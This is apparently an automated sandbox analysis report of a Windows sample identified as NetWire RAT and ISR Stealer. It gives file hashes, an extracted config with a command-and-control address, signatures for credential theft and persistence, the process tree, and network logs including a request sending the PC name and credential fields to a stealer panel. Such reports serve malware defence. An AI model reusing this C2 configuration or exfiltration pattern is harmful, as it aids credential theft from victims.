Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

09f7912493...18.exe

windows7-x64

10

09f7912493...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    30/04/2024, 14:35 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe

  • Size

    989KB

  • MD5

    09f7912493d7b995e0d765387b8ce2a1

  • SHA1

    0bcf195f1a77e3d02c67b532780796fb1a37d25f

  • SHA256

    5927e4d65f85b8656396c8f02379f3954d38f19ac63e9d00596f666f6dc796ab

  • SHA512

    97cd60f9afca58ccd0b52d54ac9b0f4ea8f7c2d03a500ee16df7e1d3ce1a1c4fca13ee5e919e4787c44729a4bff45a28f9831e07259649064e77de889be1dba1

  • SSDEEP

    12288:FCvX+LmZFa2rGkXVuOTb51KIyISYsBEa5D8FF3eDwI6md1AxLoHxWpgXX:04Q5GkvdUIyISY+5ouD9t1C8HxW

Score
10/10
isrstealernetwirebotnetcollectionpersistenceratspywarestealertrojanupx

Malware Config

Extracted

Family

netwire

C2

91.192.100.25:3369

Attributes
  • activex_autorun

    true

  • activex_key

    {3757GA31-8R2X-4686-5K7C-I4FIR5682QEX}

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    true

  • startup_name

    NetWire

  • use_mutex

    false

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

    trojanstealerisrstealer
  • ISR Stealer payload 1 IoCs
  • NetWire RAT payload 2 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Modifies Installed Components in the registry 2 TTPs 2 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\Desktop\Server.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Users\Admin\Desktop\Server.exe
        "C:\Users\Admin\Desktop\Server.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Users\Admin\Desktop\Server.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\qvYPLwBnc5.ini"
          4⤵
          • Executes dropped EXE
          PID:2544
        • C:\Users\Admin\Desktop\Server.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\lAOOcdAq7n.ini"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook accounts
          PID:1572
    • C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Adds Run key to start application
      PID:1628

Network

  • flag-us
    DNS
    riyanshoppingbags.com
    Server.exe
    Remote address:
    8.8.8.8:53
    Request
    riyanshoppingbags.com
    IN A
    Response
    riyanshoppingbags.com
    IN A
    212.32.237.91
  • flag-nl
    GET
    http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename=
    Server.exe
    Remote address:
    212.32.237.91:80
    Request
    GET /skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename= HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: riyanshoppingbags.com
    Response
    HTTP/1.1 429 Too Many Requests
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 17
    date: Tue, 30 Apr 2024 14:35:38 GMT
    server: nginx
    set-cookie: sid=ea069c54-06fe-11ef-8e25-a473ffc9c576; path=/; domain=.riyanshoppingbags.com; expires=Sun, 18 May 2092 17:49:45 GMT; max-age=2147483647; HttpOnly
  • 212.32.237.91:80
    http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename=
    http
    Server.exe
    409 B
     560 B
     5
    5

    HTTP Request

    GET http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename=

    HTTP Response

    429
  • 91.192.100.25:3369
    09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
    152 B
     120 B
     3
    3
  • 91.192.100.25:3369
    09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
    152 B
     120 B
     3
    3
  • 8.8.8.8:53
    riyanshoppingbags.com
    dns
    Server.exe
    67 B
     83 B
     1
    1

    DNS Request

    riyanshoppingbags.com

    DNS Response

    212.32.237.91

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\qvYPLwBnc5.ini
    Filesize

    5B

    MD5

    d1ea279fb5559c020a1b4137dc4de237

    SHA1

    db6f8988af46b56216a6f0daf95ab8c9bdb57400

    SHA256

    fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

    SHA512

    720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

    Download Submit

  • C:\Users\Admin\Desktop\Server.exe
    Filesize

    260KB

    MD5

    e8f2b14ab5381c021c8085c43be1804b

    SHA1

    d10afc60fb1347b2b3c44fee4456fa94bcf95b8f

    SHA256

    7557fabff96ad819525f43a133680cc1ef3acb61a5f8e3df4c385b6244ad6fed

    SHA512

    2dd2cee9ba3a1e327fa517cbe81fb0180e6216932df1cb9581ed4e4b9a0ff54b50c875629aaa2e17af91172b60d65ca326b4690a4ca182b88913cfb87c12e7cc

    Download Submit

  • memory/1572-33-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1572-30-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1572-29-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1572-26-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1628-38-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/1628-37-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/1888-34-0x0000000074590000-0x0000000074C7E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1888-3-0x0000000004990000-0x00000000049D0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1888-0-0x0000000000B60000-0x0000000000C5C000-memory.dmp

    Filesize

    1008KB

    Download

  • memory/1888-35-0x0000000004990000-0x00000000049D0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1888-36-0x0000000004990000-0x00000000049D0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1888-2-0x0000000000330000-0x000000000034E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1888-1-0x0000000074590000-0x0000000074C7E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1888-39-0x0000000074590000-0x0000000074C7E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2544-22-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download

  • memory/2544-20-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download

  • memory/2544-19-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download

  • memory/2544-18-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download

  • memory/2544-14-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.